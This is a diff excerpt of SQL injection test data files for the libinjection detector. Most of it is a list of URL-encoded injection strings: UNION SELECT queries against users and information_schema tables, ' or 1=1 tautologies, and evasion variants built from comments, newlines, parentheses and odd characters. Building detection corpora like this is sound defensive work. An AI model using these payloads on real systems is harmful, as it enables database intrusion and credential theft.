|
||||
# the following don't fit into the libinjection model and are
|
||||
# best handled in another layer, at least for now.
|
||||
#)-sleep(9999
|
||||
#*/UNION SELECT password FROM users--
|
3
libinjection/data/sqli-github-modsec-782.txt
Normal file
3
libinjection/data/sqli-github-modsec-782.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/782
|
||||
|
||||
.1or-UTC_DATE--
|
265
libinjection/data/sqli-hackers.txt
Normal file
265
libinjection/data/sqli-hackers.txt
Normal file
|
@ -0,0 +1,265 @@
|
|||
1%20AND%20%28select%20DCount%28last%28username%29
|
||||
1%29%20from%20users%20where%20username%3D%27ad1min%27%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%20%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
|
||||
%28select%20login/2%20from%20users%20limit%201%2C1%29
|
||||
%28select%20login/2%20%0D%0A%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x00%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x30%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x3%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-0union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20table_name%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C%0D%0A%0D%0A1%0D%0A%0D%0A%2C%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A1%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C
|
||||
%28select%20substr%28login%0D%0A%29
|
||||
%28select%20substr%28login%29
|
||||
%28select%20substr%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
##%28select%20asd%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
/%2A%20BAR%20%2A/%20UNION%20ALL%20SELECT%20%282%2C3%2C4%29
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
%27%20or%201%3D1%20or%20%27
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27foo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
a%0D%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
id%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20xxx%20from%20users%20limit%201%2C1%29
|
||||
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%27%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%231aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%231a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%231a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23--1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23--%20-1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%20union%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union
|
||||
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%0Aunion%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23union%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23feafafeas%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23feafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--eafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--eafafeas%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20union%28%20select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20table_name%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20all%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%23%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20select%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0Cselect%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0C%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0C-%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1--%0D%0A%20union%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27union%20select%20us3rs%20from%20table1
|
||||
%27-%40aa1-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40UNION1-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841-%40%D0%B0%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a1%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2-%40a3%5E%40a3%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2-%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2%5E%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%401%20union%20select%20us3rs%20from%20table1
|
||||
%27-%401%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select-table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29
|
||||
-1%20union%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
%27-%40a1%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%23%20union%20%20%20%0D%0Aun%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%23%0D%0A%0D%0Aunion
|
||||
-1%23%0D%0A%0D%0Aunion%20%23
|
||||
-1%23%0D%0A%0D%0Aunion%20%23%0D%0A%23
|
||||
-1%23%0D%0Aunion%20%23%0D%0A%23
|
||||
-1%23union%20%23%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0Aunion
|
||||
#-1%23union%20%23%23%0D%0A---%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23unn%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0A/%2A%2A/union%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A%23/%0D%0A/%2A%2A/union%23--
|
||||
-1%23union%20%23%23%0D%0A/1/%2A%2A/union%23--
|
||||
